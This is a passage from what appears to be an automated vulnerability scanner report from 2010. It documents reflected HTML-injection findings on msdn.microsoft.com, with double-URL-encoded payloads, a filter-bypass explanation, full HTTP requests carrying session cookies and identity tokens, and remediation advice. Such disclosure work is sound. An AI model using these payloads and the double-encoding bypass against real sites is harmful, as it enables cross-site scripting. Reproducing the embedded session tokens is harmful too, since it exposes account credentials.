17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:46 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff361664.aspx18998"><a>4dd5a078452" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c821%2522%253e%253ca%253ede13ab68088 was submitted in the REST URL parameter 1. This input was echoed as 3c821"><a>de13ab68088 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us3c821%2522%253e%253ca%253ede13ab68088/library/ff921345.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3c821"><a>de13ab68088/library/ff921345" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c33c4%2522%253e%253ca%253eb63170bd290 was submitted in the REST URL parameter 2. This input was echoed as c33c4"><a>b63170bd290 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryc33c4%2522%253e%253ca%253eb63170bd290/ff921345.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:44 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc33c4"><a>b63170bd290/ff921345" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc4f%2522%253e%253ca%253ea5cb942ec49 was submitted in the REST URL parameter 3. This input was echoed as 3fc4f"><a>a5cb942ec49 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ff921345.aspx3fc4f%2522%253e%253ca%253ea5cb942ec49 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff921345.aspx3fc4f"><a>a5cb942ec49" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87f9c%2522%253e%253ca%253e4444cb60aed was submitted in the REST URL parameter 1. This input was echoed as 87f9c"><a>4444cb60aed in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us87f9c%2522%253e%253ca%253e4444cb60aed/library/ms123401.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:10 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87f9c"><a>4444cb60aed/library/ms123401" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b6c%2522%253e%253ca%253ea82109ceb41 was submitted in the REST URL parameter 2. This input was echoed as 48b6c"><a>a82109ceb41 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library48b6c%2522%253e%253ca%253ea82109ceb41/ms123401.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:21 GMT
